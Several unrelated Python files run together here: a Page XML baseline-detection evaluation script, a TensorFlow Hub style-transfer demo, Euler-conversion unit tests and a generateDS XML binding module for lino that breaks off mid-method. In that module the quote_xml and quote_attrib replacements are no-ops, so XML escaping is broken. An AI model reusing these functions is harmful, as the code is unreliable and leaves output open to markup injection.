def compute_baseline_detection_measure(polygon_dict_gt, polygon_dict_hy,
min_tol=10, max_tol=30, rel_tol=0.25, poly_tick_dist=5):
"""
:param polygon_dict_gt: ground truth article / block ID's with corresponding lists of polygons
:param polygon_dict_hy: hypotheses article / block ID's with corresponding lists of polygons
:param min_tol: MINIMUM distance tolerance which is not penalized
:param max_tol: MAXIMUM distance tolerance which is not penalized
:param rel_tol: fraction of estimated interline distance as tolerance values
:param poly_tick_dist: desired distance (measured in pixels) of two adjacent pixels in the normed polygons
:return: baseline detection measure ,i.e., r and p value (for all baselines and only for baselines assigned to
articles / blocks)
"""
list_of_gt_polygons, list_of_gt_polygons_without_none = [], []
list_of_hy_polygons, list_of_hy_polygons_without_none = [], []
for gt_article_id in polygon_dict_gt:
list_of_gt_polygons += polygon_dict_gt[gt_article_id]
if gt_article_id is not None:
list_of_gt_polygons_without_none += polygon_dict_gt[gt_article_id]
for hy_article_id in polygon_dict_hy:
list_of_hy_polygons += polygon_dict_hy[hy_article_id]
if hy_article_id is not None:
list_of_hy_polygons_without_none += polygon_dict_hy[hy_article_id]
print("{:<100s} {:>10d} {:<1s} {:>10d}".
format("number of ground truth baselines / hypotheses baselines",
len(list_of_gt_polygons), "/", len(list_of_hy_polygons)))
print("{:<100s} {:>10d} {:<1s} {:>10d}".
format("number of ground truth baselines with article ID's / hypotheses baselines with article ID's",
len(list_of_gt_polygons_without_none), "/", len(list_of_hy_polygons_without_none)))
# create baseline measure evaluation
bl_measure_eval = \
BaselineMeasureEval(min_tol=min_tol, max_tol=max_tol, rel_tol=rel_tol, poly_tick_dist=poly_tick_dist)
# baseline detection measure for all baselines
if len(list_of_gt_polygons) == 0:
r_value_bd, p_value_bd = None, None
elif len(list_of_hy_polygons) == 0:
r_value_bd, p_value_bd = 0, 0
else:
bl_measure_eval.calc_measure_for_page_baseline_polys(polys_truth=list_of_gt_polygons,
polys_reco=list_of_hy_polygons)
r_value_bd = bl_measure_eval.measure.result.page_wise_recall[-1]
p_value_bd = bl_measure_eval.measure.result.page_wise_precision[-1]
# baseline detection measure only for baselines assigned to articles / blocks
if len(list_of_gt_polygons_without_none) == 0:
r_value_bd_without_none, p_value_bd_without_none = None, None
elif len(list_of_hy_polygons_without_none) == 0:
r_value_bd_without_none, p_value_bd_without_none = 0, 0
else:
bl_measure_eval.calc_measure_for_page_baseline_polys(polys_truth=list_of_gt_polygons_without_none,
polys_reco=list_of_hy_polygons_without_none)
r_value_bd_without_none = bl_measure_eval.measure.result.page_wise_recall[-1]
p_value_bd_without_none = bl_measure_eval.measure.result.page_wise_precision[-1]
return r_value_bd, p_value_bd, r_value_bd_without_none, p_value_bd_without_none
def get_greedy_sum(array):
"""
:param array: matrix as numpy array
:return: greedy sum of the given matrix
"""
matrix = np.copy(array)
s = 0
while True:
# calculate indices for maximum element
max_idx_x, max_idx_y = np.unravel_index(np.argmax(matrix), matrix.shape)
# finish if all elements have been considered
if matrix[max_idx_x, max_idx_y] < 0:
break
# get max element
s += matrix[(max_idx_x, max_idx_y)]
# set row and column to -1
matrix[max_idx_x, :] = -1.0
matrix[:, max_idx_y] = -1.0
return s
def run_eval(gt_file, hy_file, min_tol=10, max_tol=30, rel_tol=0.25, poly_tick_dist=5):
"""
:param gt_file: ground truth Page XML file (with baselines and article / block ID's)
:param hy_file: hypotheses Page XML file (with baselines and article / block ID's)
:param min_tol: MINIMUM distance tolerance which is not penalized
:param max_tol: MAXIMUM distance tolerance which is not penalized
:param rel_tol: fraction of estimated interline distance as tolerance values
:param poly_tick_dist: desired distance (measured in pixels) of two adjacent pixels in the normed polygons
:return: baseline detection measure, baseline detection measure only for baselines assigned to articles / blocks and
the article / block segmentation measure
"""
if not gt_file.endswith(".xml") or not hy_file.endswith(".xml"):
print("!! Ground truth and hypotheses file have to be in Page XML format !!\n")
return None, None, None
gt_polygons_dict = get_data_from_pagexml(path_to_pagexml=gt_file)
hy_polygons_dict = get_data_from_pagexml(path_to_pagexml=hy_file)
bd_r_value, bd_p_value, bd_r_value_without_none, bd_p_value_without_none \
= compute_baseline_detection_measure(polygon_dict_gt=gt_polygons_dict, polygon_dict_hy=hy_polygons_dict,
min_tol=min_tol, max_tol=max_tol, rel_tol=rel_tol,
poly_tick_dist=poly_tick_dist)
if bd_r_value is None:
print("!! Ground truth Page XML has no baselines !!\n")
return None, None, None
if bd_r_value_without_none is None:
print("!! Ground truth Page XML has no article / block ID's !!\n")
bd_f_value = f_measure(recall=bd_r_value, precision=bd_p_value)
return (bd_r_value, bd_p_value, bd_f_value), None, None
bd_f_value = f_measure(recall=bd_r_value, precision=bd_p_value)
bd_f_value_without_none = f_measure(recall=bd_r_value_without_none, precision=bd_p_value_without_none)
# baselines without an article / block ID are irrelevant for our measure
gt_polygons_dict.pop(None, None)
# number of GT articles
number_of_gt_articles = len(gt_polygons_dict)
hy_polygons_dict.pop(None, None)
# number of HY articles
number_of_hy_articles = len(hy_polygons_dict)
print("{:<100s} {:>10d} {:<1s} {:>10d}\n".
format("number of ground truth articles / hypotheses articles",
number_of_gt_articles, "/", number_of_hy_articles))
if number_of_hy_articles == 0:
return (bd_r_value, bd_p_value, bd_f_value), \
(bd_r_value_without_none, bd_p_value_without_none, bd_f_value_without_none), (0, 0, 0)
##########
# computation of the weighted r and p matrix
r_matrix = np.zeros((number_of_gt_articles, number_of_hy_articles), dtype=np.float)
p_matrix = np.zeros((number_of_gt_articles, number_of_hy_articles), dtype=np.float)
# create baseline measure evaluation
bl_measure_eval = BaselineMeasureEval(min_tol=min_tol, max_tol=max_tol, rel_tol=rel_tol,
poly_tick_dist=poly_tick_dist)
hy_weighting_append = True
gt_block_weighting_factors = []
hy_block_weighting_factors = []
# baseline detection measure between every ground truth and hypotheses article / block
for gt_article_index, gt_article_id in enumerate(gt_polygons_dict):
gt_block_weighting_factors.append(float(len(gt_polygons_dict[gt_article_id])))
for hy_article_index, hy_article_id in enumerate(hy_polygons_dict):
if hy_weighting_append:
hy_block_weighting_factors.append(float(len(hy_polygons_dict[hy_article_id])))
bl_measure_eval.calc_measure_for_page_baseline_polys(polys_truth=gt_polygons_dict[gt_article_id],
polys_reco=hy_polygons_dict[hy_article_id])
r_matrix[gt_article_index, hy_article_index] = bl_measure_eval.measure.result.page_wise_recall[-1]
p_matrix[gt_article_index, hy_article_index] = bl_measure_eval.measure.result.page_wise_precision[-1]
hy_weighting_append = False
# multiplication of the rows (row-wise weighting for recall) / columns (column-wise weighting for precision)
# by the corresponding weighting factors
gt_block_weighting = \
np.asarray([1 / sum(gt_block_weighting_factors) * x for x in gt_block_weighting_factors], dtype=np.float)
hy_block_weighting = \
np.asarray([1 / sum(hy_block_weighting_factors) * x for x in hy_block_weighting_factors], dtype=np.float)
r_matrix = r_matrix * np.expand_dims(gt_block_weighting, axis=1)
p_matrix = p_matrix * hy_block_weighting
as_r_value = get_greedy_sum(array=r_matrix)
as_p_value = get_greedy_sum(array=p_matrix)
as_f_value = f_measure(recall=as_r_value, precision=as_p_value)
return (bd_r_value, bd_p_value, bd_f_value), \
(bd_r_value_without_none, bd_p_value_without_none, bd_f_value_without_none), \
(as_r_value, as_p_value, as_f_value)
def run_measure(gt_files, hy_files, min_tol, max_tol, rel_tol, poly_tick_dist, verbose=True):
if len(gt_files) != len(hy_files):
print(f"Length of GT list ({len(gt_files)}) has to match length of HY list ({len(hy_files)})!")
exit(1)
# start java virtual machine to be able to execute the java code
jpype.startJVM(jpype.getDefaultJVMPath())
bd_average, bd_counter = [0, 0, 0], 0
bd_without_none_average, bd_without_none_counter = [0, 0, 0], 0
as_average, as_counter = [0, 0, 0], 0
if verbose:
for i, (gt_file, hy_file) in enumerate(zip(gt_files, hy_files)):
print("-" * 125)
print("Ground truth file: ", gt_file)
print("Hypotheses file : ", hy_file, "\n")
tuple_bd, tuple_bd_without_none, tuple_as = run_eval(gt_file=gt_file, hy_file=hy_file,
min_tol=min_tol, max_tol=max_tol,
rel_tol=rel_tol, poly_tick_dist=poly_tick_dist)
print("{:<50s} {:>10s} {:>10s} {:>10s}".format("Mode", "R-value", "P-value", "F-value"))
if tuple_bd is not None:
print("{:<50s} {:>10f} {:>10f} {:>10f}".
format("baseline detection measure - all baselines", tuple_bd[0], tuple_bd[1], tuple_bd[2]))
bd_average = [bd_average[i] + tuple_bd[i] for i in range(len(bd_average))]
bd_counter += 1
else:
print("{:<50s} {:>10s} {:>10s} {:>10s}".
format("baseline detection measure - all baselines", "-", "-", "-"))
if tuple_bd_without_none is not None:
print("{:<50s} {:>10f} {:>10f} {:>10f}".
format("baseline detection measure - without none",
tuple_bd_without_none[0], tuple_bd_without_none[1], tuple_bd_without_none[2]))
bd_without_none_average = \
[bd_without_none_average[i] + tuple_bd_without_none[i] for i in range(len(bd_without_none_average))]
bd_without_none_counter += 1
else:
print("{:<50s} {:>10s} {:>10s} {:>10s}".
format("baseline detection measure - without none", "-", "-", "-"))
if tuple_as is not None:
print("{:<50s} {:>10f} {:>10f} {:>10f}".
format("article / block segmentation measure", tuple_as[0], tuple_as[1], tuple_as[2]))
as_average = [as_average[i] + tuple_as[i] for i in range(len(as_average))]
as_counter += 1
else:
print("{:<50s} {:>10s} {:>10s} {:>10s}".
format("article / block segmentation measure", "-", "-", "-"))
else:
for i, (gt_file, hy_file) in enumerate(zip(gt_files, hy_files)):
tuple_bd, tuple_bd_without_none, tuple_as = run_eval(gt_file=gt_file, hy_file=hy_file,
min_tol=min_tol, max_tol=max_tol,
rel_tol=rel_tol, poly_tick_dist=poly_tick_dist)
if tuple_bd is not None:
bd_average = [bd_average[i] + tuple_bd[i] for i in range(len(bd_average))]
bd_counter += 1
if tuple_bd_without_none is not None:
bd_without_none_average = \
[bd_without_none_average[i] + tuple_bd_without_none[i] for i in range(len(bd_without_none_average))]
bd_without_none_counter += 1
if tuple_as is not None:
as_average = [as_average[i] + tuple_as[i] for i in range(len(as_average))]
as_counter += 1
print("-" * 125)
print("-" * 125)
print("AVERAGE VALUES")
print("{:<50s} {:>10s} {:>10s} {:>10s} {:>25s} {:>10s}".
format("Mode", "R-value", "P-value", "F-value", "valid evaluated files", "all files"))
if bd_counter > 0:
print("{:<50s} {:>10f} {:>10f} {:>10f} {:>25d} {:>10d}".
format("baseline detection measure - all baselines",
1 / bd_counter * bd_average[0], 1 / bd_counter * bd_average[1], 1 / bd_counter * bd_average[2],
bd_counter, len(gt_files)))
else:
print("{:<50s} {:>10s} {:>10s} {:>10s} {:>25d} {:>10d}".
format("baseline detection measure - all baselines", "-", "-", "-", bd_counter, len(gt_files)))
if bd_without_none_counter > 0:
print("{:<50s} {:>10f} {:>10f} {:>10f} {:>25d} {:>10d}".
format("baseline detection measure - without none",
1 / bd_without_none_counter * bd_without_none_average[0],
1 / bd_without_none_counter * bd_without_none_average[1],
1 / bd_without_none_counter * bd_without_none_average[2],
bd_without_none_counter, len(gt_files)))
else:
print("{:<50s} {:>10s} {:>10s} {:>10s} {:>25d} {:>10d}".
format("baseline detection measure - without none", "-", "-", "-",
bd_without_none_counter, len(gt_files)))
if as_counter > 0:
print("{:<50s} {:>10f} {:>10f} {:>10f} {:>25d} {:>10d}".
format("article / block segmentation measure",
1 / as_counter * as_average[0], 1 / as_counter * as_average[1], 1 / as_counter * as_average[2],
as_counter, len(gt_files)))
else:
print("{:<50s} {:>10s} {:>10s} {:>10s} {:>25d} {:>10d}".
format("article / block segmentation measure", "-", "-", "-", as_counter, len(gt_files)))
# shut down the java virtual machine
jpype.shutdownJVM()
if __name__ == "__main__":
parser = ArgumentParser()
# command-line arguments
parser.add_argument('--path_to_gt_xml_lst', type=str, required=True,
help="path to the lst file containing the file paths of the ground truth Page XML's")
parser.add_argument('--path_to_hy_xml_lst', type=str, required=True,
help="path to the lst file containing the file paths of the hypotheses Page XML's")
parser.add_argument('--min_tol', type=int, default=-1,
help="MINIMUM distance tolerance which is not penalized, -1 for dynamic calculation")
parser.add_argument('--max_tol', type=int, default=-1,
help="MAXIMUM distance tolerance which is not penalized, -1 for dynamic calculation")
parser.add_argument('--rel_tol', type=float, default=0.25,
help="fraction of estimated interline distance as tolerance values")
parser.add_argument('--poly_tick_dist', type=int, default=5,
help="desired distance (measured in pixels) of two adjacent pixels in the normed polygons")
parser.add_argument('--verbose', nargs='?', const=True, default=True, type=str2bool,
help="print evaluation for every single file in addition to overall summary")
flags = parser.parse_args()
# list of xml file paths
gt_xml_files = [line.rstrip('\n') for line in open(flags.path_to_gt_xml_lst, "r")]
hy_xml_files = [line.rstrip('\n') for line in open(flags.path_to_hy_xml_lst, "r")]
# filter hy files by gt file (for train, val, test splits)
gt_base_names = [os.path.splitext(os.path.basename(file))[0] for file in gt_xml_files]
hy_xml_files = list(sorted([file for file in hy_xml_files if any([gt in os.path.basename(file) for gt in gt_base_names])], key=os.path.basename))
gt_xml_files = list(sorted(gt_xml_files, key=os.path.basename))
run_measure(gt_xml_files, hy_xml_files, flags.min_tol, flags.max_tol, flags.rel_tol,
flags.poly_tick_dist, flags.verbose)
|
<filename>fast_stylize.py
import functools
import os
from matplotlib import gridspec
import matplotlib.pylab as plt
import numpy as np
import tensorflow as tf
import tensorflow_hub as hub
print("TF Version: ", tf.__version__)
print("TF-Hub version: ", hub.__version__)
print("Eager mode enabled: ", tf.executing_eagerly())
print("GPU available: ", tf.test.is_gpu_available())
#Define image loading and visualization functions { display-mode: "form" }
def crop_center(image):
"""Returns a cropped square image."""
shape = image.shape
new_shape = min(shape[1], shape[2])
offset_y = max(shape[1] - shape[2], 0) // 2
offset_x = max(shape[2] - shape[1], 0) // 2
image = tf.image.crop_to_bounding_box(
image, offset_y, offset_x, new_shape, new_shape)
return image
@functools.lru_cache(maxsize=None)
def load_image(image_url, image_size=(256, 256), preserve_aspect_ratio=True):
"""Loads and preprocesses images."""
# Cache image file locally.
image_path = tf.keras.utils.get_file(os.path.basename(image_url)[-128:], image_url)
# Load and convert to float32 numpy array, add batch dimension, and normalize to range [0, 1].
img = plt.imread(image_path).astype(np.float32)[np.newaxis, ...]
if img.max() > 1.0:
img = img / 255.
if len(img.shape) == 3:
img = tf.stack([img, img, img], axis=-1)
img = crop_center(img)
img = tf.image.resize(img, image_size, preserve_aspect_ratio=True)
return img
def show_n(images, titles=('',)):
n = len(images)
image_sizes = [image.shape[1] for image in images]
w = (image_sizes[0] * 6) // 320
plt.figure(figsize=(w * n, w))
gs = gridspec.GridSpec(1, n, width_ratios=image_sizes)
for i in range(n):
plt.subplot(gs[i])
plt.imshow(images[i][0], aspect='equal')
plt.axis('off')
plt.title(titles[i] if len(titles) > i else '')
plt.show()
#Load example images { display-mode: "form" }
content_image_url = 'https://github.com/sha256burim/Implementation-of-TensorFlow-Fast-GAN-Neural-Style-Transfer/blob/main/face1.jpg'
style_image_url = 'https://github.com/sha256burim/Implementation-of-TensorFlow-Fast-GAN-Neural-Style-Transfer/blob/main/van.jpg'
output_image_size = 500
# The content image size can be arbitrary.
content_img_size = (output_image_size, output_image_size)
# The style prediction model was trained with image size 256 and it's the
# recommended image size for the style image (though, other sizes work as
# well but will lead to different results).
#style_img_size = (256, 256) #keep it at 256.
style_img_size = (500, 500)
content_image = load_image(content_image_url, content_img_size)
style_image = load_image(style_image_url, style_img_size)
style_image = tf.nn.avg_pool(style_image, ksize=[3,3], strides=[1,1], padding='SAME')
show_n([content_image, style_image], ['Content image', 'Style image'])
# Load TF-Hub module.
hub_handle = 'https://tfhub.dev/google/magenta/arbitrary-image-stylization-v1-256/2'
hub_module = hub.load(hub_handle)
# Stylize content image with given style image.
# This is pretty fast within a few milliseconds on a GPU.
outputs = hub_module(tf.constant(content_image), tf.constant(style_image))
stylized_image = outputs[0]
# Visualize input images and the generated stylized image.
show_n([content_image, style_image, stylized_image], titles=['Original content image', 'Style image', 'Stylized image'])
#Done, enjoy your stylized image
|
import sys
sys.path.insert(0, './../')
import unittest
import transforms3d
import numpy as np
import numpy.random as rnd
import tensorflow as tf
import math as m
import tf_transforms3d.euler as ELR
class TestEuler(unittest.TestCase):
def test_euler2quat(self):
batchsize = 1024
euler = (rnd.random(size=(batchsize, 3)) - 0.5) * 2 * m.pi
euler = euler.astype('float32')
Q_np = []
for i in range(batchsize):
Q = transforms3d.euler.euler2quat(*euler[i], axes='sxyz')
Q_np.append(Q)
Q_np = np.array(Q_np)
Q_tf = ELR.euler2quat(euler)
Dif = np.abs(Q_np - Q_tf)
N = np.linalg.norm(Q_tf, axis=1)
self.assertAlmostEqual(1., np.min(N), places=4)
self.assertAlmostEqual(1., np.max(N), places=4)
self.assertAlmostEqual(0., np.max(Dif), places=5)
def test_euler2mat(self):
batchsize = 1024
euler = (rnd.random(size=(batchsize, 3)) - 0.5) * 2 * m.pi
euler = euler.astype('float32')
R_np = []
for i in range(batchsize):
R = transforms3d.euler.euler2mat(*euler[i], axes='sxyz')
R_np.append(R)
R_np = np.array(R_np)
R_tf = ELR.euler2mat(euler)
Dif = np.abs(R_np - R_tf)
ELR.mat2euler(R_tf)
self.assertAlmostEqual(0., np.max(Dif), places=5)
def test_mat2euler(self):
batchsize = 1024
euler = (rnd.random(size=(batchsize, 3)) - 0.5) * 2 * m.pi
euler = euler.astype('float32')
R_np = []
for i in range(batchsize):
R = transforms3d.euler.euler2mat(*euler[i], axes='sxyz')
R_np.append(R)
R_np = np.array(R_np)
R_tf = ELR.euler2mat(euler)
Dif = np.abs(R_np - R_tf)
ELR.mat2euler(R_tf)
self.assertAlmostEqual(0., np.max(Dif), places=5)
euler_tf = ELR.mat2euler(R_tf)
euler_np = []
for i in range(batchsize):
ax, ay, az = transforms3d.euler.mat2euler(R_np[i])
euler_np.append((ax, ay, az))
euler_np = np.array(euler_np, dtype=np.float32)
Dif = np.abs(euler_np - euler_tf)
self.assertAlmostEqual(0., np.max(Dif), places=5)
def test_quat2euler(self):
batchsize = 1024
euler = (rnd.random(size=(batchsize, 3)) - 0.5) * 2 * m.pi
Q_np = []
for i in range(batchsize):
Q = transforms3d.euler.euler2quat(*euler[i], axes='sxyz')
Q_np.append(Q)
Q_np = np.array(Q_np, dtype=np.float32)
euler_np = []
for i in range(batchsize):
eul = transforms3d.euler.quat2euler(Q_np[i])
euler_np.append(eul)
euler_np = np.array(euler_np, dtype=np.float32)
euler_tf = ELR.quat2euler(Q_np)
Dif = np.abs(euler_tf - euler_np)
self.assertAlmostEqual(0., np.max(Dif), places=4)
if __name__ == '__main__':
unittest.main()
|
<reponame>NewRGB/lino
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Mon Oct 03 15:32:11 2011 by generateDS.py version 2.6a.
#
import sys
import getopt
import re as re_
etree_ = None
Verbose_import_ = False
(XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
try:
# lxml
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
except ImportError:
try:
# cElementTree from Python 2.5+
import xml.etree.cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree on Python 2.5+")
except ImportError:
try:
# ElementTree from Python 2.5+
import xml.etree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree on Python 2.5+")
except ImportError:
try:
# normal cElementTree install
import cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree")
except ImportError:
try:
# normal ElementTree install
import elementtree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree")
except ImportError:
raise ImportError(
"Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
if (XMLParser_import_library == XMLParser_import_lxml and
'parser' not in kwargs):
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
kwargs['parser'] = etree_.ETCompatXMLParser()
doc = etree_.parse(*args, **kwargs)
return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError, exp:
class GeneratedsSuper(object):
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return '%f' % input_data
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(
node, 'Requires sequence of booleans ("true", "1", "false", "0")')
return input_data
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
# fix_any
def gds_build_any(self, node, type_name=None):
return None
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
# ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
# exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'ascii'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
#
# Support/utility functions.
#
def showIndent(outfile, level):
for idx in range(level):
outfile.write(' ')
def quote_xml(inStr):
if not inStr:
return ''
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
if XMLParser_import_library == XMLParser_import_lxml:
msg = '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, )
else:
msg = '%s (element %s)' % (msg, node.tag, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(outfile, level, namespace, name)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (self.name, self.value, self.name))
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' %
(self.category, self.content_type, self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' %
(self.category, self.content_type, self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s",\n' %
(self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name):
self.name = name
def get_name(self):
return self.name
def set_data_type(self, data_type):
self.data_type = data_type
def get_data_type_chain(self):
return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container):
self.container = container
def get_container(self):
return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class ServiceRequestType(GeneratedsSuper):
"""A single request to a servicereplace with the actual service request
body"""
subclass = None
superclass = None
def __init__(self, ServiceId=None, Version=None, any_=None):
self.ServiceId = ServiceId
self.Version = Version
# fix_any
self.any_ = any_
def factory(*args_, **kwargs_):
if ServiceRequestType.subclass:
return ServiceRequestType.subclass(*args_, **kwargs_)
else:
return ServiceRequestType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ServiceId(self):
return self.ServiceId
def set_ServiceId(self, ServiceId):
self.ServiceId = ServiceId
def get_Version(self):
return self.Version
def set_Version(self, Version):
self.Version = Version
# fix_any
def get_any_(self):
return self.any_
def set_any_(self, any_):
self.any_ = any_
def export(self, outfile, level, namespace_='', name_='ServiceRequestType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed,
namespace_, name_='ServiceRequestType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='ServiceRequestType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='ServiceRequestType', fromsubclass_=False):
if self.ServiceId is not None:
showIndent(outfile, level)
outfile.write('<%sServiceId>%s</%sServiceId>\n' %
(namespace_, self.gds_format_string(quote_xml(self.ServiceId).encode(ExternalEncoding), input_name='ServiceId'), namespace_))
if self.Version is not None:
showIndent(outfile, level)
outfile.write('<%sVersion>%s</%sVersion>\n' %
(namespace_, self.gds_format_string(quote_xml(self.Version).encode(ExternalEncoding), input_name='Version'), namespace_))
# fix_any
if self.any_:
#~ self.any_.export(outfile, level, namespace_, name_='description', )
self.any_.export(outfile, level, namespace_)
def hasContent_(self):
if (
self.ServiceId is not None or
self.Version is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='ServiceRequestType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.ServiceId is not None:
showIndent(outfile, level)
outfile.write('ServiceId=%s,\n' %
